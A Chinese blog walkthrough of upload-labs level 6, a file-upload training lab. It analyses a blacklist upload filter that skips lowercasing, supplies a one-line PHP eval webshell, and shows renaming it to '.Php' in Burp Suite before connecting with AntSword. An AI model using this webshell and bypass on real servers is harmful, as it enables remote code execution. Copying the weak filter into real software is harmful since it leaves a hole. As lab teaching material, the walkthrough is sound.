upload-labs第六关教程

于 2024-06-10 18:30:12 发布
阅读量470 收藏 1
点赞数 18
文章标签: android 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73528952/article/details/139528718
版权

upload-labs第六关教程

一、源代码分析

代码审计

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

这里的代码相对于上一关的代码来说,对.ini文件进行了过滤,但是这里缺少了转换小写的操作,也就是这一句话$file_ext = strtolower($file_ext); 这一关并没有这一段,所以是不是可以考虑大小写进行绕过?

二、绕过分析

1)大小写绕过

编写eval.php文件

<?php @eval($_POST['cmd']); ?>

使用Burp suite进行抓包修改

这里就是要大小写进行绕过你需要考虑它所在的黑名单进行过滤了那些就行了。例如这里过滤了.pHp",".pHp5",".pHp4",".pHp3",".pHp2",所以是不是可以考虑PHP进行绕过或者我这里选择的Php。
例如:
修改之前:
在这里插入图片描述这里的filename为eval.php。

修改之后:
在这里插入图片描述
这里的filename为eval.Php。

放包

在这里插入图片描述上传成功。

查找url

在这里插入图片描述这里显示500错误,解决办法:将phpstudy切换为php+nginx应该就行了。
在这里插入图片描述再次上传eval.Php。
在这里插入图片描述
查看之后,发现没有500错误,使用中国蚁剑进行连接

使用中国蚁剑进行连接

在这里插入图片描述

Estera.
关注
  • 18
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Upload-labs 6-10 文件上传靶场
m0_73910867的博客
10-03 846
Upload-labs 6-10 图文解说 文件上传漏洞
upload-labs 06(空格绕过)
LuckySec
11-07 603
题目 首先,查看源码 分析,发现该代码没有对文件后缀名进行空格限制 可以使用bp进行截断文件,给文件后缀名后加上空格 文件上传成功!
upload-labs 第6-20
h0ld1rs的博客
07-17 1247
upload-labs数6-20第6第7第8第9第10第11 这几都是特殊的绕过检测方式 第6 第六其实没什么思路,就是对比了一下和第五的代码发现 第六代码没有这个 因为后缀名对大小写不敏感的问题, 我们第五采用了大小写混合注入,那么这,给后缀名加上留白,能否达到效果呢?我们用burp抓包修改 将.php之前加上留白,forward,ok,成功 第7 老套路,比较第六和第七的不同, 发现,第七缺少这个 意思是我们可以采用末尾加点来绕过判断机制 ok,成功 第8 对比
7. Spring MVC 4.1-文件上传
一个人的人生
11-19 594
7.1 文件上传 在控制器参数使用@RequestParam("file") MultipartFile file接受单个文件上传;在控制器参数使用@RequestParam("file") MultipartFile[] files接受多个文件上传;通过配置MultipartResolver来配置文件上传的一些属性; 7.2 示例 增加和上传和文件操
upload-labs】————7、Pass-06
Fly_鹏程万里
08-15 347
界面 判断是前端检测还是后端检测: 之后查看源代码: 所有的文件后缀、大小写处理后过滤,但是对于后缀名却没有进行去除空格处理,这里可以通过在后缀名中加入空格绕过: 添加空格: 浏览器中访问: ...
安装upload-labs
最新发布
10-22
安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 安装upload-labs的...
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个卡,从基础...
upload-labs19-20以及总结1
08-08
6. **文件名处理**:在Pass20中,程序不仅检查文件扩展名,还检查MIME类型,提高了安全性。然而,它依然没有验证文件内容,仅根据文件名的最后部分(即扩展名)来判断。这提示我们,文件名处理应该更全面,包括大小...
上传文件漏洞靶场upload-labs
09-27
为了有效地使用`upload-labs`靶场,你需要按照博客教程的步骤操作,逐步完成各个挑战。这些挑战将帮助你理解如何检测、利用以及修复这些漏洞。同时,通过解决这些问题,你还可以学习到如何在实际开发中实施有效的...
upload-labs-master.zip
06-22
【描述】描述中的 "文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master" 显示这是一个针对文件上传漏洞的系列练习,通过多次嵌套的目录结构,可能旨在模拟不同...
upload-labs通(Pass-06~Pass-10)
箭雨镜屋
10-08 1760
Pass-06 上传sh.php失败,burp中将抓到的包send to repeater 修改filename为sh.xxx发现可以上传成功,说明是黑名单过滤 将报文send to intruder,按照Pass-03的套路爆破后缀名(upload-labs通(Pass-01~Pass-05)_箭雨镜屋-CSDN博客) 爆破结果用../upload过滤,发现只有如下后缀的文件上传成功 仔细查看Response报文后发现,有如下两个文件可以作为webshell(服务器是window.
upload-labs靶场-Pass-06-思路以及过程
weixin_44257023的博客
01-15 2134
开始前的小准备 upload-labs靶场 是PHP环境运行的,所以我准备了一个PHP脚本和一张图片 图片好准备,PHP脚本如果不想写的话可以用我的这个获取当前时间的PHP脚本 <?php header("content-type:text/html;charset=utf-8"); date_default_timezone_set("PRC");//设置时区 echo "当前时间为:"; $today = date("Y-m-d D h:i:s A "); echo $today; ?
upload-labs(6~10)通记录
jemo的博客
04-15 240
1~5过程可以看我上篇博客 upload-labs6~10和一个小问题通过过程第六第七一个小问题 通过过程 第六 查看源代码和提示,这题依然是ban了不少东西(估计之后的题都是这样的吧),不过没把大小写ban了(这不是别博客上第五的题吗,到我这是第六了) 所以我们可以用大小写绕过,依旧抓包,改后缀名呗 第七 看完源代码,把大小写ban了,还可以用空格绕过,就是可以在后缀名加空格绕过,理论上可以这样,不过我试了试还是没能绕过 没办法,只能用把后缀名改为php . .的方法了 具体操
文件上传之upload-labs 6~10 详细介绍
weixin_51446936的博客
09-18 1211
一、Pass-06(大小写绕过) 仔细阅读黑名单,查看是否有被忽略的后缀名,当前可以使用 phP 绕过 提示:本pass禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.asp
当黑客就入门 upload-labs pass6-10
Tuye的博客
07-27 541
pass6 pass7 pass8 pass9 pass10
upload-labs之第六
田田云逸的博客
10-28 798
Pass06 打开第六先查看提示 可以看到依然是黑名单禁止了很多的文件后缀,接下来再看看源码吧 $is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pH.
upload-labs靶场 6-10 详细教学 上传漏洞
小明师傅博客
06-02 690
第六 发现前面几的都进黑名单了,大写也默认转小写了 但对比发现 没有做对首尾去空处理 我们上传时抓包在文件名加个空格,发现成功了 第七 空格后缀也被禁了,但是少了删除文件名后的点 “.” 所以我们利用windwos特性,会自动去掉文件后缀名最后的“.”进行上传。 抓包在文件名后面加个点 成功 第八 老办法对比前面的卡发现少了一句,应该就是抓包在后缀加上::$DATA了 原理查了一下就是必须是windows, 必须是php, 必须是那个源文件 php在window的时候如果文件名
upload-labs pass06-12
hclimg的博客
07-31 392
pass-06: 查看提示: 还是黑名单限制,通过查看源代码,知道删除了文件名后面的., 但是并没有删除空格,所以通过上传一个后缀名再添加一个空格的文件去绕过黑名单,windoes在创建文件时会自动删掉最后的空格。 上传成功,访问图片链接 成功!!! pass-07: 查看提示: 查看源代码可知,服务器端把文件名后面的空格给删除了 Windows有个特性,就是如果文件名后缀以.或者空格结尾...
upload-labs第六
08-17
upload-labs第六于文件名后缀黑名单限制上传的一个挑战。根据引用中的提示,本禁止上传后缀为".asp"、".aspx"、".php"和".jsp"的文件。在这一中,你需要绕过这个限制,成功上传一个包含这些后缀的文件。 ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值